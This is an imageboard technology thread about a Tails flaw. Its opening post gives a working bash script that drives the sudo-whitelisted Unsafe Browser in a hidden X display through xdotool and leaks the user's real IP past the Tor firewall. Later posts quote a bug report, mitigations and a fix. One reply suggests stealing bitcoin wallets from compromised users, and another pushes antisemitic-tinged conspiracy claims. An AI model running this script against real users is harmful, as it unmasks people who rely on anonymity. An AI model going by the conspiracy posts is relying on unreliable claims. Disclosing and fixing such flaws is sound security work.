[ / / / / / / / / / / / / / ] [ dir / choroy / dempart / femcel / gtpone / lewd / lovelive / podawful / rec ][Options][ watchlist ]

/tech/ - Technology

You can now write text to your AI-generated image at https://aiproto.com It is currently free to use for Proto members.
Email
Comment *
File
Select/drop/paste files here
Password (Randomized for file and post deletion; you may also set your own.)
* = required field[▶ Show post options & limits]
Confused? See the FAQ.
Expand all images

[–]

 No.1039972>>1040103 >>1040281 [Watch Thread][Show All Posts]

Because of a sudoder.d rule to allow running sudo unsafe-browser with NOPASSWD, this example script can run in the background and leak your public IP with no interaction or indication it's happening. No Privilege Escalation needed


#!/bin/bash

export DISPLAY=:69
mv /run/user/1000/bus{,.bak}

Xvfb $DISPLAY -r -nocursor & xpid=$!
sleep 1

sudo DISPLAY=$DISPLAY unsafe-browser &>/dev/null &

xdotool search --sync --name zenity 1>/dev/null
xdotool key --delay 200 Tab Return

xdotool search --sync --name Unsafe 1>/dev/null
xdotool key --delay 200 ctrl+l
xdotool type --delay 200 www.yourip.us
xdotool key --delay 200 Return

xdotool search --sync --name Your getwindowname | awk '{print $5}'

mv /run/user/1000/bus{.bak,}
kill "$xpid"
exit 0

 No.1039976>>1039977

Tails is just debian with iptables andan upgrade program included


 No.1039977>>1040089

>>1039976

that's literally every linux distro ever


 No.1039979>>1040030

>this example script can run in the background

how's that going to happen exactly?

>leak your public IP

>www.yourip.us

just have it connect to a server set up to listen for such requests.

what is that server going to do with this information? If it can't be correlated with anything, it's just "someone ran Tails on this IP"


 No.1040024>>1040198

this is why whonix style is superior

always have a workstation vm and a gateway vm

ensure the workstation only connect to the internet via tor ports, nat is disabled, everything firewalled off, etc.

no matter how much you fuck up on the workstation it will be nearly impossible to connect to anything outside of the tor ports on the gateway, short of exploit allowing you to jump out of a VM, but then your fucked anyway.


 No.1040030>>1040031

>>1039979

That's just an example, you can do worse things, you just need to compromise the amnesia account first, which I consider gameover anyway.

>how's that going to happen exactly?

It uses x fuckery to run hidden gui prorgrams and xdotool to simulate mouse and keynoard presses. the script just navigates to www.yourip.us in the unsafe browser and reads the window name, all while it's hidden from view


 No.1040031>>1040194

>>1040030

Is the point of this thread that executing untrusted scripts in Tails can be dangerous?


 No.1040069>>1040202

>not using heads

https://heads.dyne.org/


 No.1040089

>>1039977

>$ Xvfb

<-bash: Xvfb: command not found

>$ xdotool

<-bash: xdotool: command not found


 No.1040103

>>1039972 (OP)

>installing sudo

>insalling *bus

>installing zenity

>using any of that bloat to open your attack surface up

Isn't that supposed to be a operating system for security/privacy? Where's the statically compiled musl? Where's the GRSEC and RBAC? is this a joke?


 No.1040116

i become curl | bash destroyer of noobs


 No.1040121>>1040797

UNIX has more holes than Swiss cheese.

Subject: Re: UNIX (In)Security

> From: AB
>
> I'm trying to convince my favorite TLA official that
> putting data on a UNIX machine on the TLA network is about
> as secure as posting it to alt.flame. Does anyone have a
> document on UNIX (in)security I could pass on?

alt.flame would be inappropriate if the material in question
isn't a flame or a response to one. I suggest tla.bboard if
the data is about things of general interest (like how much
certain people make).

Or, you could just put it up for anonymous ftp with the X
sources (eww!) on export.eve.rcl.ear. Then post a "ThE
sEkrIt Tla dATa yoU hAve BeEn waItInG foR is ON
eXpoRt.eve.rcl.ear" message to misc.wanted.

Seriously, look at the Kerberos papers. Look at the Orange
Book (trusted systems evaluation manual from the NCSC).
Realize that Unix security is like swiss cheese - not a
Jarlsberg or other cheese with a few big holes in it, but an
Alpine Lace cheese with thousands of tiny holes in it which
you could never plug all of. You can wrap it in saran wrap,
but you've still done nothing for the underlying structure,
save for reducing the rate at which mold grows on it.


 No.1040194

>>1040031

the point is that tails claims the amnesia user cant leak your real IP without escalating to another user (priv escalation exploit). The OP shows it can.


 No.1040195

sudo rm /etc/sudoers.d/zzz_unsafe-browser

issue fixed


 No.1040198

>>1040024

This.

Allowing access to the regular internet is just an accident waiting to happen.


 No.1040199

There has been a ticket for this for almost a year but it's been ignored.

https://redmine.tails.boum.org/code/issues/15635

The X11 protocol has long been known to not provide isolation between windows. Here I will show that it can be abused to bypass the firewall without any user interaction or visible side-effects by abusing the Unsafe Browser. I also provide mitigations while waiting for the switch to Wayland.

The existence of the clearnet user and the sudoers whitelist1 for the Unsafe Browser makes it possible to reliably bypass the firewall by abusing the X11 protocol. Previously, I've seen doubts that this can be done surreptitiously and claims that it would necessarily require that the users see the browser pop up and the mouse be moved without their control. I have written a simple PoC (proof of concept) exploit which bypasses the firewall to show that is untrue:

The Unsafe Browser, or more specifically the clearnet user, should not be enabled and functional by default. Whenever it is not needed, the clearnet user should be locked, and the Unsafe Browser should either throw an error on access or not even be displayed. I can think of three mitigations:

Disable the browser by default, requiring it to be explicitly enabled in the splash screen.

Disable the browser as soon as Tor successfully connects, which would indicate no captive portal.

Attempt captive portal detection2 to detect request rewrites and enable the Unsafe Browser only then.

I am marking this as a bug because this PoC clearly shows that the Unsafe Browser violates the security principles in the specified design documents3. Until the switch to Wayland is completed (and perhaps even then), the existence of the clearnet user should be considered incompatible with anonymous Tor usage. I am currently working on another exploit which bypasses the browser AppArmor profile without user interaction in order for this to be possible from within the context of a compromised browser as well. If I have the time, I will finish it up and report it as well.

[1]: https://git-tails.immerda.ch/tails/plain/config/chroot_local-includes/etc/sudoers.d/zzz_unsafe-browser

[2]: https://www.chromium.org/chromium-os/chromiumos-design-docs/network-portal-detection

[3]: https://tails.boum.org/contribute/design/Unsafe_Browser/


 No.1040202>>1040210

>>1040069

I wouldn't trust heads, an early version had the controlport open for To without a filter/whitelist and a simple GETINFO address to the Tor controlport would reveal your true IP. It's since been fixed but that's an amatuer mistake.


 No.1040208

Who cares about their IP? If you can get RCE on a tails user, go for the electrum/bitcoin wallet. 90% of people who use tails are drug dealers/buyers.

Before https://www.reddit.com/r/darknetmarketsnoobs was banned, it has thousands of viewers a day and all the posts were mostly normies having issues running Tails.


 No.1040210

>>1040202

Also, a simple priv escalation bug just was fixed in the latest version of heads 0.4. Updates weren't even GPG signed. Use heads with caution.


 No.1040217>>1040219 >>1040283

How does tails get millions of dollar in donations? I literally made something that works exactly like tails with debian live-build in 3 days with a few hours of work a day. It didn't have the auto update infrastructure but still. It was the same way that tails build images, through deban live-build scripts with a packagelist and preconfigured configs.


 No.1040219

>>1040217

How much are you paying your shills? How many news sites have you had publish a shill piece on it?

At least you can reap some benefits from security by obscurity.


 No.1040281>>1040307

File (hide): 40f430768a17caa⋯.png (4.5 KB, 220x98, 110:49, hello3.png) (h) (u)

File (hide): 23e027611625565⋯.png (4.49 KB, 220x96, 55:24, hello2.png) (h) (u)

File (hide): 7327394182c12d8⋯.png (6.6 KB, 304x100, 76:25, hello.png) (h) (u)

>>1039972 (OP)

>trusting Tails Amnesia just because Ed "the Clown In America who used his NSA clearance to fuck with the NSA ops as former CIA double-acting baking soda agent" told them he uses it and he's famous like there's 3 movies about him and big posters looking like he's 2013 Che Guevarra .

>trusting Tails ever

>Qubes

>Tor project

>Securedrop

>not looking closely into his family tree

>easy mode : wiki pedia

"Let's shill a justwerks (((anonymous))) system pack for pesky journalists, traitorous insiders, and whistleblowers that are against or a threat to our agendas. Now that they watched those movies of their rockstar super hero Snowden or even most of his speeches they'll fall to memetics and quickly use and trust our tools like a tool (not a pun) and so that then we can kill these very threatening pesky pests so we can finally see the light in our grand agendas."

"say no more" -Ed


 No.1040283

>>1040217

Slush fund from the big 3

>soros, roths, rocks (exclude saudis since they sided with trumpo)


 No.1040307

>>1040281

Notice how this NSA shill spreads FUD without backing up his claims or even offering secure alternatives to what he perceives as a honeypot. Begone officer.


 No.1040797>>1040811

>>1040121

Windows has more holes than the average claim on /tech/ but life goes on. Also linux is not unix.


 No.1040811

>>1040797

>Windows has more holes than the average claim on /tech/ but life goes on.

Are you a Microsoft shill, else why are you bringing up Windows?

>Also linux is not unix.

Correct, but it and the user spaces that are commonly paired with it are UNIX-like.




[Return][Go to top][Catalog][Screencap][Nerve Center][Cancer][Update] ( Scroll to new posts) ( Auto) 5
25 replies | 1 images | Page ?
[Post a Reply]
[ / / / / / / / / / / / / / ] [ dir / choroy / dempart / femcel / gtpone / lewd / lovelive / podawful / rec ][ watchlist ]